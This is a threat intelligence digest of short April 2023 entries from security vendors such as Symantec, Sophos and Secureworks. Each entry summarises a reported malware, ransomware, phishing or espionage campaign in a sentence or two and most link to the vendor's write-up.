- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has recently discovered the distribution of the BlackBit ransomware disguised as svchost.exe during the team's monitoring. According to ASEC's internal infrastructure, the BlackBit ransomware has been continuously distributed.
—
- Intel Source:
- Threatmon
- Intel Name:
- New_Attack_Chain_Uncovered_From_Blind_Eagle_Cyber_Espionage_Group
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Threatmon have observed that the cyber espionage actor tracked as Blind Eagle has been linked to a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems.
Source:
https://threatmon.io/apt-blind-eagles-malware-arsenal-technical-analysis/
—
- Intel Source:
- Secureworks
- Intel Name:
- Bumblebee_Malware_Distributing_Via_Trojanized_Installer_Downloads
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- Secureworks researchers have observed Bumblebee malware being distributed through trojanized installer downloads.
Source:
https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads
—
- Intel Source:
- Symantec
- Intel Name:
- Daggerfly_APT_Group_Targeting_Telecoms_Company_in_Africa
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified that Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.
—
- Intel Source:
- Symantec
- Intel Name:
- Play_Ransomware_Group_Using_New_Custom_Data_Gathering_Tools
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have identified that the Play ransomware group is using two new, custom-developed tools that allow it to enumerate all users and computers on a compromised network, and copy files from the Volume Shadow Copy Service (VSS) that are normally locked by the operating system.
—
- Intel Source:
- Google Blog
- Intel Name:
- Russian_Hackers_Conducting_Phishing_Attacks_in_Ukraine
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Google Threat Analysis researchers have observed that Russian government-backed phishing campaigns targeted users in Ukraine the most, with the country accounting for over 60% of observed Russian targeting.
Source:
https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Hackers_Promptly_Adopting_Web3_IPFS_Technology
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- PaloAlto researchers have observed several types of cyberthreats using the InterPlanetary File System (IPFS), including phishing, credential theft, command and control (C2) communications, and malicious payload distribution. They also observed a significant jump in IPFS-related traffic at the beginning of 2022.
Source:
https://unit42.paloaltonetworks.com/ipfs-used-maliciously/
—
- Intel Source:
- NTT Security
- Intel Name:
- USB_Based_FlowCloud_Malware_Attacks
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from NTT Security have observed that several companies have been infected with FlowCloud. It is known as malware used by an attack group called TA410 and has been observed since around 2019.
Source:
https://insight-jp.nttsecurity.com/post/102id0t/usbflowcloud
—
- Intel Source:
- Sophos
- Intel Name:
- EDR_Killer_AuKill_Exploiting_Process_Explorer_Drivers
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- Sophos researchers have investigated multiple incidents where attackers attempted to disable EDR clients with a new defense evasion tool dubbed AuKill. The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.
Source:
https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
—
- Intel Source:
- CSIRT-MON
- Intel Name:
- Belarus_Linked_Hacking_Group_Targeting_Poland_With_New_Disinformation_Campaign
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- CSIRT-MON researchers have issued a warning about a recent disinformation campaign traced back to the Belarus-linked hacking group known as Ghostwriter.
Source:
https://csirt-mon.wp.mil.pl/pl/articles/6-aktualnosci/dezinformacja-o-rekrutacji-do-litpolukrbrig/
—
- Intel Source:
- Team-Cymru
- Intel Name:
- SideCopy_Attack_Chain_Deploying_AllaKore_RAT
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have analyzed the SideCopy group and discovered the SideCopy attack chain used to deploy AllaKore RAT. It is an open-source remote access tool that has been modified for the purposes of SideCopy operations and is commonly observed in their intrusions.
Source:
https://www.team-cymru.com/post/allakore-d-the-sidecopy-train
—
- Intel Source:
- Sucuri
- Intel Name:
- Hackers_Using_Abandoned_WordPress_Plugins_to_Backdoor_Websites
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Sucuri researchers have identified that attackers are using Eval PHP, an outdated legitimate WordPress plugin, to compromise websites by injecting stealthy backdoors.
Source:
https://blog.sucuri.net/2023/04/massive-abuse-of-abandoned-evalphp-wordpress-plugin.html
—
- Intel Source:
- Uptycs
- Intel Name:
- Hackers_From_Pakistan_Using_Linux_Malware_Poseidon_to_Target_Indian_Government_Agencies
- Date of Scan:
- 2023-04-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Uptycs have identified a Pakistan-based advanced persistent threat actor known as Transparent Tribe using a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.
Source:
https://www.uptycs.com/blog/cyber_espionage_in_india_decoding_apt_36_new_linux_malware
—
- Intel Source:
- Cyble
- Intel Name:
- New_Strain_of_Ransomware_Named_CrossLock
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new strain of ransomware called CrossLock, written in the Go programming language. It employs the double-extortion technique to increase the likelihood of payment from its victims: the victim’s data is exfiltrated from the system as well as encrypted.
—
- Intel Source:
- Cofense
- Intel Name:
- Phishing_Campaign_Targeting_EPOS_Net_Customers
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- The Cofense Phishing Defense Center has observed a sophisticated phishing campaign targeting customers of EPOS Net, a large Japanese credit card company. The campaign is notable for its meticulously crafted emails and cloned website, as well as its use of official customer service numbers to create an illusion of legitimacy.
—
- Intel Source:
- BlackBerry
- Intel Name:
- Google_Ads_Abuse_and_Spear_Phishing_Campaigns_Impersonating_Spains_Tax_Agency
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry have observed two parallel malicious campaigns that share the same infrastructure but serve different purposes. The first is a malvertising campaign on the Google Ads platform; the second is a massive spear-phishing campaign targeting large organizations based in Spain. The spear-phishing campaign impersonated Spain’s tax agency with the goal of harvesting the email credentials of companies in Spain.